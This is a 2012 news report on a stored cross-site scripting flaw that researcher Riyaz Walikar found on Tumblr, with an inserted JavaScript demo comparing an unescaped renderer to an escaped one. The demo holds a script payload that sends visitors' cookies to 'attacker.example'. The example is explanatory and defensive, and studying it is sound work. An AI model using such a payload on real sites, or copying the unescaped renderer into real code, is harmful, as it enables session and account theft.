Riyaz Walikar has notified the site's representatives, but the issue hasn't been fixed

Jul 13, 2012 14:41 GMT  ·  By

Security researcher Riyaz Ahemed Walikar has identified a persistent cross-site scripting (XSS) vulnerability on the popular microblogging platform Tumblr.

XSS flaws are very common on today's websites, but most of them are reflected (non-persistent) and therefore generally less dangerous: the payload runs only for a victim who follows a specially crafted link.

“XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer,” Walikar explained.

“Stored XSS is even more dangerous since the script is stored on the server and is executed every time a user visits an infected page.”
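The difference Walikar describes, a payload submitted once and then served to every visitor, as an added example that is not code from the article, from Walikar's write-up or from Tumblr; the in-memory post store, the two renderers and the attacker URL are hypothetical, and the check only looks for a script element in the rendered HTML rather than executing it in a browser:

```javascript
// Added example: a minimal in-memory "microblog" that shows why stored
// (persistent) XSS is worse than reflected XSS. Hypothetical store and
// renderers, not Tumblr's implementation.

// Server-side store: a post is saved once and rendered on every later visit.
const posts = [];

function createPost(author, body) {
  // Vulnerable pattern: the raw body is stored exactly as submitted.
  posts.push({ author, body });
  return posts.length - 1;
}

// Escape the five characters that let user text break out of an HTML
// text node or a double-quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable renderer: the stored body is concatenated into the page unescaped.
function renderUnsafe(id) {
  const p = posts[id];
  return `<div class="post"><b>${p.author}</b>: ${p.body}</div>`;
}

// Hardened renderer: every untrusted field is escaped at output time.
function renderSafe(id) {
  const p = posts[id];
  return `<div class="post"><b>${escapeHtml(p.author)}</b>: ${escapeHtml(p.body)}</div>`;
}

// Crude check used only for this demo: does the rendered HTML contain a
// live <script> element? (A real test would load the page in a browser.)
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Constructed attacker payload: a "post" that exfiltrates document.cookie
// to a hypothetical attacker-controlled host.
const PAYLOAD =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Simulate one malicious post followed by three separate visitors.
function demo() {
  const id = createPost("mallory", PAYLOAD);
  const visitors = ["alice", "bob", "carol"];
  // With the vulnerable renderer the same stored payload fires on each visit.
  const unsafePages = visitors.map(() => renderUnsafe(id));
  // With output encoding the payload is shown as text, never executed.
  const safePages = visitors.map(() => renderSafe(id));
  return {
    unsafeHits: unsafePages.filter(containsScriptTag).length,
    safeHits: safePages.filter(containsScriptTag).length,
    safeHtml: safePages[0],
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

Run it with `node` and `unsafeHits` comes out as 3 against 0 for the escaped renderer: the attacker submitted the payload once, but because it lives in the store rather than in a link, every visitor to the page is hit until the stored content is cleaned or the output is encoded.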

According to the expert, Tumblr was notified of the issue more than three weeks ago, but so far the website's representatives have failed to address it. Walikar says that he will publish more technical details on the security hole in the near future.

Update. Walikar has told Softpedia that the persistent XSS vulnerability has been addressed by Tumblr. The technical details are available on his blog.